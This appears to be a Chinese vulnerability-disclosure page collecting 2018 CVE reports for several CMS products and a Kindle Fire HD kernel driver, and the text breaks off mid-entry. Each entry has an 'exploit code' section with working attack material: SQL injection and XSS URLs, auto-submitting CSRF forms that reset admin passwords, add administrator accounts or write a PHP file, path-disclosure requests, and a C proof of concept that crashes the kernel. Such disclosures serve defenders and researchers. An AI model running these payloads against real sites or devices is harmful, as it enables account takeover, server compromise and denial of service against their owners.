CVE中文申请站

CVE-2018-17129:Metinfo-6.1.2版本存在SQL注入漏洞

一、漏洞摘要

漏洞名称: Metinfo-6.1.2版本存在SQL注入漏洞
上报日期: 2018-10-12
漏洞发现者: 踏月留香
产品首页: https://www.metinfo.cn/
软件链接: https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip
版本: 6.1.2
CVE编号: CVE-2018-17129


二、漏洞概述

漏洞存在于MetInfo6.1.2/app/system/feedback/admin/feedback_admin.class.php页面中,由于该页面的class1参数过滤不严,导致存在SQL注入漏洞。
本地搭建网站,首先登录网站后台:http://172.16.141.134/MetInfo6.1.2/admin/,登录成功后,构造payload:
http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1//union//select//concat(0x3a,user(),0x3a)//from/**/information_schema.tables&met_fd_export=-1,访问后网站会导出一个excel表,excel表的名称为数据库用户名:
sqli.png

三、利用代码

exp代码如下:

http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=29&n=feedback&c=feedback_admin&a=doexport&class1=-1/**/union/**/select/**/concat(0x3a,user(),0x3a)/**/from/**/information_schema.tables&met_fd_export=-1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/54/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-17129
exploit-db:发布中

CVE-2018-18296:Metinfo-6.1.2版本存在XSS漏洞

一、漏洞摘要

漏洞名称: Metinfo-6.1.2版本存在XSS漏洞
上报日期: 2018-10-12
漏洞发现者: 踏月留香
产品首页: https://www.metinfo.cn/
软件链接: https://www.metinfo.cn/upload/file/MetInfo6.1.2.zip
版本: 6.1.2
CVE编号: CVE-2018-18296


二、漏洞概述

漏洞存在于MetInfo6.1.2/admin/index.php页面,由于参数bigclass过滤不严,导致XSS漏洞
本地搭建网站,首先登录网站后台:http://172.16.141.134/MetInfo6.1.2/admin/,登录成功后,构造payload:
http://172.16.141.134/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e即可执行跨站脚本
xss.png

三、利用代码

exp代码如下:

http://127.0.0.1/MetInfo6.1.2/admin/index.php?lang=cn&anyid=25&n=column&c=index&a=doadd&bigclass=1%22%3e%3cscript%3ealert(/xss/)%3c%2fscript%3e


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/52/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18296
exploit-db:发布中

CVE-2018-11021:Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞

一、漏洞摘要

漏洞名称: Amazon Kindle Fire HD (3rd Generation)内核驱动拒绝服务漏洞
上报日期: 2018-10-10
漏洞发现者: 大兵
产品首页: http://www.amazon.com/
软件链接: https://fireos-tablet-src.s3.amazonaws.com/46sVcHzumgrjpCXPHw6oygKVmw/kindle_fire_7inch_4.5.5.3.tar.bz2
版本: Fire OS 4.5.5.3
CVE编号: CVE-2018-11021


二、漏洞概述

Amazon Kindle Fire HD(3rd) Fire OS 4.5.5.3的内核模块/omap/drivers/video/omap2/dsscomp/device.c代码中存在漏洞,允许攻击者通过ioctl向驱动模块/dev/dsscomp发生命令为1118064517且精心构造的payload参数,导致内核崩溃。
三、利用代码

三、利用代码

exp代码如下:

/*
 * This is poc of Kindle Fire HD 3rd
 * A bug in the ioctl interface of device file /dev/dsscomp causes the system crash via IOCTL 1118064517.
 * Related buggy struct name is dsscomp_setup_dispc_data.
 * This Poc should run with permission to do ioctl on /dev/dsscomp.
 *
 * The fowllwing is kmsg of kernel crash infomation:
 *
 *
 */
#include <stdio.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/ioctl.h>

const static char *driver = "/dev/dsscomp";
static command = 1118064517; 

int main(int argc, char **argv, char **env) {
    unsigned int payload[] = {
    0xffffffff,
    0x00000003,
    0x5d200040,
    0x79900008,
    0x8f5928bd,
    0x78b02422,
    0x00000000,
    0xffffffff,
    0xf4c50400,
    0x007fffff,
    0x8499f562,
    0xffff0400,
    0x001b131d,
    0x60818210,
    0x00000007,
    0xffffffff,
    0x00000000,
    0x9da9041c,
    0xcd980400,
    0x001f03f4,
    0x00000007,
    0x2a34003f,
    0x7c80d8f3,
    0x63102627,
    0xc73643a8,
    0xa28f0665,
    0x00000000,
    0x689e57b4,
    0x01ff0008,
    0x5e7324b1,
    0xae3b003f,
    0x0b174d86,
    0x00000400,
    0x21ffff37,
    0xceb367a4,
    0x00000040,
    0x00000001,
    0xec000f9e,
    0x00000001,
    0x000001ff,
    0x00000000,
    0x00000000,
    0x0000000f,
    0x0425c069,
    0x038cc3be,
    0x0000000f,
    0x00000080,
    0xe5790100,
    0x5b1bffff,
    0x0000d355,
    0x0000c685,
    0xa0070000,
    0x0010ffff,
    0x00a0ff00,
    0x00000001,
    0xff490700,
    0x0832ad03,
    0x00000006,
    0x00000002,
    0x00000001,
    0x81f871c0,
    0x738019cb,
    0xbf47ffff,
    0x00000040,
    0x00000001,
    0x7f190f33,
    0x00000001,
    0x8295769b,
    0x0000003f,
    0x869f2295,
    0xffffffff,
    0xd673914f,
    0x05055800,
    0xed69b7d5,
    0x00000000,
    0x0107ebbd,
    0xd214af8d,
    0xffff4a93,
    0x26450008,
    0x58df0000,
    0xd16db084,
    0x03ff30dd,
    0x00000001,
    0x209aff3b,
    0xe7850800,
    0x00000002,
    0x30da815c,
    0x426f5105,
    0x0de109d7,
    0x2c1a65fc,
    0xfcb3d75f,
    0x00000000,
    0x00000001,
    0x8066be5b,
    0x00000002,
    0xffffffff,
    0x5cf232ec,
    0x680d1469,
    0x00000001,
    0x00000020,
    0xffffffff,
    0x00000400,
    0xd1d12be8,
    0x02010200,
    0x01ffc16f,
    0xf6e237e6,
    0x007f0000,
    0x01ff08f8,
    0x000f00f9,
    0xbad07695,
    0x00000000,
    0xbaff0000,
    0x24040040,
    0x00000006,
    0x00000004,
    0x00000000,
    0xbc2e9242,
    0x009f5f08,
    0x00800000,
    0x00000000,
    0x00000001,
    0xff8800ff,
    0x00000001,
    0x00000000,
    0x000003f4,
    0x6faa8472,
    0x00000400,
    0xec857dd5,
    0x00000000,
    0x00000040,
    0xffffffff,
    0x3f004874,
    0x0000b77a,
    0xec9acb95,
    0xfacc0001,
    0xffff0001,
    0x0080ffff,
    0x3600ff03,
    0x00000001,
    0x8fff7d7f,
    0x6b87075a,
    0x00000000,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141,
    0x001001ff,
    0x00000000,
    0x00000001,
    0xff1f0512,
    0x00000001,
    0x51e32167,
    0xc18c55cc,
    0x00000000,
    0xffffffff,
    0xb4aaf12b,
    0x86edfdbd,
    0x00000010,
    0x0000003f,
    0xabff7b00,
    0xffff9ea3,
    0xb28e0040,
    0x000fffff,
    0x458603f4,
    0xffff007f,
    0xa9030f02,
    0x00000001,
    0x002cffff,
    0x9e00cdff,
    0x00000004,
    0x41414141,
    0x41414141,
    0x41414141,
    0x41414141 };

        int fd = 0;
        fd = open(driver, O_RDWR);
        if (fd < 0) {
            printf("Failed to open %s, with errno %d\n", driver, errno);
            system("echo 1 > /data/local/tmp/log");
            return -1;
        }
        
        printf("Try open %s with command 0x%x.\n", driver, command);
        printf("System will crash and reboot.\n");
        if(ioctl(fd, command, &payload) < 0) {
            printf("Allocation of structs failed, %d\n", errno);
            system("echo 2 > /data/local/tmp/log");
            return -1;
        }
        close(fd);
        return 0;
}


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/50/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11021
Kindle Kernel Sources:https://www.amazon.com/gp/help/customer/display.html?nodeId=200203720
exploit-db:发布中

CVE-2018-18191:Finecms_v5.4存在CSRF漏洞可修改管理员账户密码

一、漏洞摘要

漏洞名称: Finecms_v5.4存在CSRF漏洞可修改管理员账户密码
上报日期: 2018-10-07
漏洞发现者: 踏月留香
产品首页: http://www.finecms.net/
软件链接: http://down.chinaz.com/soft/32596.htm
版本: 5.4
CVE编号: CVE-2018-18191


二、漏洞概述

恶意攻击者可以精心伪造一个html页面诱骗已登录的管理用户点击,从而更改管理员账户密码。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://127.0.0.1/admin.php?c=member&m=edit&uid=1" method="POST">
      <input type="hidden" name="page" value="0" />
      <input type="hidden" name="member&#91;email&#93;" value="admin&#64;163&#46;com" />
      <input type="hidden" name="member&#91;name&#93;" value="admin" />
      <input type="hidden" name="member&#91;phone&#93;" value="18888888888" />
      <input type="hidden" name="member&#91;password&#93;" value="888888" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/49/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-18191
exploit-db:发布中

CVE-2018-16416:FUELCMS 1.4存在CSRF可修改管理员账户密码

一、漏洞摘要

漏洞名称: FUELCMS 1.4存在CSRF可修改管理员账户密码
上报日期: 2018-08-25
漏洞发现者: 惜潮
产品首页: https://github.com/daylightstudio/FUEL-CMS
软件链接: https://github.com/daylightstudio/FUEL-CMS
版本: 1.4
CVE编号: CVE-2018-16416


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面 从而更改管理员账户密码。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title>CSRF</title>
</head>
<form action="http://127.0.0.1/fuel/my_profile/edit?inline=" method="POST">
     <input type="hidden" name="user_name" value="hacker"><!--admin's name-->
     <input type="hidden" name="email" value="test@mail.com"><!--admin's email-->
   <input type="hidden" name="first_name" value="admin">
   <input type="hidden" name="last_name" value="admin">
   <input type="hidden" name="new_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="confirm_password" value="xichao"><!--admin's password-->
   <input type="hidden" name="Save" value="Save">
   <input type="hidden" name="language" value="english">
   <input type="hidden" name="fuel_inline" value="0">
    <button type="submit" value="Submit">GO</button>
    </form>
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/48/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-16416
exploit-db:发布中

CVE-2018-12603:LFCMS 3.7.0存在CSRF漏洞可添加任意管理员账户

一、漏洞摘要

漏洞名称: LFCMS 3.7.0存在CSRF漏洞可添加任意管理员账户
上报日期: 2018-06-20
漏洞发现者: Bay0net
产品首页: http://www.lfdycms.com/
软件链接: http://www.lfdycms.com/home/down/index/id/26.html
版本: 3.7.0
CVE编号: CVE-2018-12603


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Member/add.html" method="POST">
      <input type="hidden" name="username" value="admin2" />
      <input type="hidden" name="password" value="admin2" />
      <input type="hidden" name="repassword" value="admin2" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/44/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12603
漏洞发现者blog:https://www.cnblogs.com/v1vvwv/p/9203899.html
exploit-db:发布中

CVE-2018-12602:LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户

一、漏洞摘要

漏洞名称: LFCMS 3.7.0存在CSRF漏洞可添加任意用户账户号
上报日期: 2018-06-20
漏洞发现者: Bay0net
产品首页: http://www.lfdycms.com/
软件链接: http://www.lfdycms.com/home/down/index/id/26.html
版本: 3.7.0
CVE编号: CVE-2018-12602


二、漏洞概述

攻击者可通过构造 CSRF 请求,来新增任意用户。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/lfdycms3.7.0/admin.php?s=/Users/add.html" method="POST">
      <input type="hidden" name="username" value="test222" />
      <input type="hidden" name="email" value="test2@qq.com" />
      <input type="hidden" name="password" value="test222" />
      <input type="hidden" name="repassword" value="test222" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/43/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12602
漏洞发现者blog:https://www.cnblogs.com/v1vvwv/p/9203740.html
exploit-db:发布中

CVE-2018-12114:maccms_v10存在CSRF漏洞可增加任意账号

一、漏洞摘要

漏洞名称: maccms_v10存在CSRF漏洞可增加任意账号
上报日期: 2018-06-11
漏洞发现者: Bay0net
产品首页: http://www.maccms.com/
软件链接: http://www.maccms.com/down.html
版本: v10
CVE编号: CVE-2018-12114


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。

三、利用代码

exp代码如下:

<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="http://10.211.55.17/maccms10/admin.php/admin/admin/info.html" method="POST">
      <input type="hidden" name="admin_id" value="" />
      <input type="hidden" name="admin_name" value="test2" />
      <input type="hidden" name="admin_pwd" value="test2" />
      <input type="hidden" name="admin_status" value="1" />
      <input type="hidden" name="admin_auth[0]" value="index/welcome" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/42/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12114
漏洞发现者blog:https://www.cnblogs.com/v1vvwv/p/9168309.html
exploit-db:发布中

CVE-2018-12290:yii2-statemachine v2.x.x存在XSS漏洞

一、漏洞摘要

漏洞名称: yii2-statemachine v2.x.x存在XSS漏洞
上报日期: 2018-06-12
漏洞发现者: longer
产品首页: https://github.com/ptheofan/yii2-statemachine-demo
软件链接: https://github.com/ptheofan/yii2-statemachine-demo
版本: v2.x.x
CVE编号: CVE-2018-12290


二、漏洞概述

由于role参数过滤不严格,导致可以插入js代码造成跨站脚本攻击。如将role参数赋值为“guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>”,并进行get方式提交,可造成跨站脚本攻击。
xss1.png

三、利用代码

exp代码如下:

https://127.0.0.1/?role=guest'%22()%26%25<acx><ScRiPt%20>prompt(123555)</ScRiPt>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/40/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-12290
exploit-db:发布中

CVE-2018-11671:GreenCMS v2.3.0603存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: GreenCMS v2.3.0603存在CSRF漏洞可增加管理员账户
上报日期: 2018-06-02
漏洞发现者: 惜潮
产品首页: https://github.com/GreenCMS/GreenCMS
软件链接: https://github.com/GreenCMS/GreenCMS
版本: v2.3.0603
CVE编号: CVE-2018-11671


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面添加管理员账户对网站进行入侵。GreenCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html>  
<html lang="en">  
<head>  
    <meta charset="UTF-8">  
    <title>csrf测试</title>  
</head>  
  <body>  
        <form action="http://127.0.0.1//14/index.php?m=admin&c=access&a=adduserhandle" method="POST" id="transfer" name="transfer">  
        <input type="hidden" name="user_id0" value="1">  
        <input type="hidden" name="user_login" value="test1">  <!--在这里可以添加JS脚本用于获取cookies  csrf+xss-->
        <input type="hidden" name="password" value="test1">  
        <input type="hidden" name="rpassword" value="test1">  
        <input type="hidden" name="user_nicename" value="123">  
        <input type="hidden" name="user_email" value="123%40Qq.com">  
        <input type="hidden" name="user_url" value="www.baidu.com">  
        <input type="hidden" name="user_intro" value="test">  
        <input type="hidden" name="user_status" value="1">  
        <input type="hidden" name="role_id" value="1">
        <button type="submit" value="Submit">添加管理员</button>  
      </form>  
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/39/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11671
exploit-db:发布中

CVE-2018-11670:GreenCMS v2.3.0603存在CSRF漏洞可获取webshell

一、漏洞摘要

漏洞名称: GreenCMS v2.3.0603存在CSRF漏洞可获取webshell
上报日期: 2018-06-02
漏洞发现者: 惜潮
产品首页: https://github.com/GreenCMS/GreenCMS
软件链接: https://github.com/GreenCMS/GreenCMS
版本: v2.3.0603
CVE编号: CVE-2018-11670


二、漏洞概述

恶意攻击者可以精心伪造一个Html页面 从而获取网站webshell。GreenCMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

exp代码如下:

<span style="font-size:18px;"><!DOCTYPE html> 
<html lang="en"> 
<head> 
    <meta charset="UTF-8"> 
    <title>csrf测试</title> 
</head> 
<form action="http://127.0.0.1//14/index.php?m=admin&c=media&a=fileconnect" method="POST" id="transfer" name="transfer">
    <!-- 下面的是生成文件名为xc.php的脚本文件 路径 127.0.0.1/Upload/xc.php -->
    <script src="http://127.0.0.1/14/index.php?m=admin&c=media&a=fileconnect&cmd=mkfile&name=xc.php&target=l1_XA&_=1527839615462"></script>
    <input type="hidden" name="cmd" value="put">
    <input type="hidden" name="target" value="l1_eGMucGhw">
     <input type="hidden" name="content" value="<?php phpinfo();?>">
    <!-- 下面的是提交表单 将content中的命令写入脚本内 -->
    <button type="submit" value="Submit">WebShell</button>
    </form>
    </body>
</html></span>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/38/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11670
exploit-db:发布中

CVE-2018-11559:DomainMod 4.10.0存在存储型XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod 4.10.0存在存储型XSS漏洞
上报日期: 2018-05-30
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.10.0
CVE编号: CVE-2018-11559


二、漏洞概述

DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_last_name”参数过滤不严格导致存在一个存储型XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:

post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test&new_last_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/37/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11559
exploit-db:发布中

CVE-2018-11558:DomainMod 4.10.0存在XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod 4.10.0存在XSS漏洞
上报日期: 2018-05-30
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.10.0
CVE编号: CVE-2018-11558


二、漏洞概述

DomainMod 4.10.0版本的“/settings/profile/index.php”页面的“new_first_name”参数过滤不严格导致存在一个XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

用户登陆后提交如下数据包,更改用户信息后,当管理员查看用户是XSS漏洞触发:

post url https://demo.domainmod.org/settings/profile/
post data:new_first_name=test%22%3E%3Cscript%3Ealert%28%2F1111%2F%29%3C%2Fscript%3E&new_last_name=test&new_email_address=test%40test.com&new_currency=USD&new_timezone=Canada%2FPacific&new_expiration_emails=0


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/36/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11558
exploit-db:发布中

CVE-2018-11404:DomainMod v4.09.03的ssl-provider-account.php页面XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod v4.09.03的ssl-provider-account.php页面XSS漏洞
上报日期: 2018-05-24
漏洞发现者: longer
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.09.03
CVE编号: CVE-2018-11404


二、漏洞概述

DomainMod v4.09.03版本的“assets/edit/ssl-provider-account.php”页面的“sslpaid”参数存在一个XSS漏洞,当用户登陆后访问url“http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E”会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/15/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11404
exploit-db:https://www.exploit-db.com/exploits/44783/

CVE-2018-11403:DomainMod v4.09.03的account-owner.php页面XSS漏洞

一、漏洞摘要

漏洞名称: DomainMod v4.09.03的account-owner.php页面XSS漏洞
上报日期: 2018-05-24
漏洞发现者: longer
产品首页: https://github.com/domainmod/domainmod
软件链接: https://github.com/domainmod/domainmod
版本: 4.09.03
CVE编号: CVE-2018-11403


二、漏洞概述

DomainMod v4.09.03版本的“assets/edit/account-owner.php”页面的“oid”参数存在一个XSS漏洞,当用户登陆后访问url“http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E”会触发XSS漏洞。DomainMod是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/14/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-11403
exploit-db:https://www.exploit-db.com/exploits/44782/

CVE-2018-9927:五指CMS 4.1.0存在CSRF漏洞可增加用户账户

一、漏洞摘要

漏洞名称: 五指CMS 4.1.0存在CSRF漏洞可增加用户账户
上报日期: 2018-04-10
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/wuzhicms/wuzhicms
软件链接: https://github.com/wuzhicms/wuzhicms
版本: 4.1.0
CVE编号: CVE-2018-9927


二、漏洞概述

五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可增加普通用户账户。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

<html><body>
<script type="text/javascript">
function post(url,fields)
{
var p = document.createElement("form");
p.action = url;
p.innerHTML = fields;
p.target = "_self";
p.method = "post";
document.body.appendChild(p);
p.submit();
}
function csrf_hack()
{
var fields;

fields += "<input type='hidden' name='info[username]' value='hack123' />";
fields += "<input type='hidden' name='info[password]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[pwdconfirm]' value='hacktest' />"; 
fields += "<input type='hidden' name='info[email]' value='taoge@5ecurity.cn' />"; 
fields += "<input type='hidden' name='info[mobile]' value='' />"; 
fields += "<input type='hidden' name='modelids[]' value='10' />"; 
fields += "<input type='hidden' name='info[groupid]' value='3' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='pids[]' value='0' />";
fields += "<input type='hidden' name='pids[]' value='0' />"; 
fields += "<input type='hidden' name='avatar' value='' />"; 
fields += "<input type='hidden' name='islock' value='0' />";
fields += "<input type='hidden' name='sys_name' value='0' />";
fields += "<input type='hidden' name='info[birthday]' value='' />"; 
fields += "<input type='hidden' name='info[truename]' value='' />"; 
fields += "<input type='hidden' name='info[sex]' value='0' />";
fields += "<input type='hidden' name='info[marriage]' value='0' />";

var url = "http://127.0.0.1/www/index.php?m=member&f=index&v=add&_su=wuzhicms&_menuid=30&_submenuid=74&submit=提交";
post(url,fields);
}
window.onload = function() { csrf_hack();}
</script>
</body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/7/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9927
exploit-db:https://www.exploit-db.com/exploits/44440/

CVE-2018-9926:五指CMS 4.1.0存在CSRF漏洞可增加管理员账户

一、漏洞摘要

漏洞名称: 五指CMS 4.1.0存在CSRF漏洞可增加管理员账户
上报日期: 2018-04-10
漏洞发现者: 套哥(taoge@5ecurity.cn)
产品首页: https://github.com/wuzhicms/wuzhicms
软件链接: https://github.com/wuzhicms/wuzhicms
版本: 4.1.0
CVE编号: CVE-2018-9926


二、漏洞概述

五指CMS 4.1.0版本存在一个CSRF漏洞,当管理员登陆后访问下面CSRF测试页面可将普通用户提成为管理员权限。五指CMS是一个在github上开源的CMS系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

CSRF测试页面代码如下:

    <html><body>
    <script type="text/javascript">
    function post(url,fields)
    {
    var p = document.createElement("form");
    p.action = url;
    p.innerHTML = fields;
    p.target = "_self";
    p.method = "post";
    document.body.appendChild(p);
    p.submit();
    }
    function csrf_hack()
    {
    var fields;
    
    fields += "<input type='hidden' name='form[role][]' value='1' />";
    fields += "<input type='hidden' name='form[username]' value='hack123' />"; 
    fields += "<input type='hidden' name='form[password]' value='' />"; 
    fields += "<input type='hidden' name='form[truename]' value='taoge@5ecurity' />"; 
    
    var url = "http://127.0.0.1/www/index.php?m=core&f=power&v=add&&_su=wuzhicms&_menuid=61&_submenuid=62&submit=提交";
    post(url,fields);
    }
    window.onload = function() { csrf_hack();}
    </script>
    </body></html>


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/6/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-9926
exploit-db:https://www.exploit-db.com/exploits/44439/

CVE-2018-8770:Cobub Razor 0.8.0存在物理路径泄露漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在物理路径泄露漏洞
上报日期: 2018-04-20
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8770


二、漏洞概述

Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统。

三、利用代码

HTTP Method: GET
http://localhost/tests/generate.php
http://localhost/tests/controllers/getConfigTest.php
http://localhost/tests/controllers/getUpdateTest.php
http://localhost/tests/controllers/postclientdataTest.php
http://localhost/tests/controllers/posterrorTest.php
http://localhost/tests/controllers/posteventTest.php
http://localhost/tests/controllers/posttagTest.php
http://localhost/tests/controllers/postusinglogTest.php
http://localhost/tests/fixtures/Controller_fixt.php
http://localhost/tests/fixtures/Controller_fixt2.php
http://localhost/tests/fixtures/view_fixt2.php
http://localhost/tests/libs/ipTest.php
http://localhost/tests/models/commonDbfix.php


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/31/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8770
EXPLOIT-DB:https://www.exploit-db.com/exploits/44495/

CVE-2018-8056:Cobub Razor 0.8.0存在物理路径泄露漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在物理路径泄露漏洞
上报日期: 2018-04-20
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8056


二、漏洞概述

Cobub Razor 0.8.0存在物理路径泄露漏洞,当访问特定url时,系统会显示物理路径信息。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

URL: http://localhost/export.php
HTTP Method: GET
URL: http://localhost/index.php?/manage/channel/addchannel
HTTP Method: POST
Data: channel_name=test"&platform=1


四、参考信息

CVE中文申请网:http://www.iwantacve.cn/index.php/archives/29/
CVE官方:http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2018-8056
EXPLOIT-DB:https://www.exploit-db.com/exploits/44495/

CVE-2018-8057:Cobub Razor 0.8.0存在SQL注入漏洞

一、漏洞摘要

漏洞名称: Cobub Razor 0.8.0存在SQL注入漏洞
上报日期: 2018-04-16
漏洞发现者: Kyhvedn(yinfengwuyueyi@163.com、kyhvedn@5ecurity.cn)
产品首页: http://www.cobub.com/
软件链接: https://github.com/cobub/razor/
版本: 0.8.0
CVE编号: CVE-2018-8057


二、漏洞概述

Cobub Razor 0.8.0存在SQL注入漏洞,“/application/controllers/manage/channel.php”页面的“channel_name”及“platform”参数过滤不严格导致存在SQL注入漏洞。Cobub Razor是一个在github上开源的系统,漏洞发现者已经将漏洞信息通过issues告知作者。

三、利用代码

http://localhost/index.php?/manage/channel/addchannel
POST data:
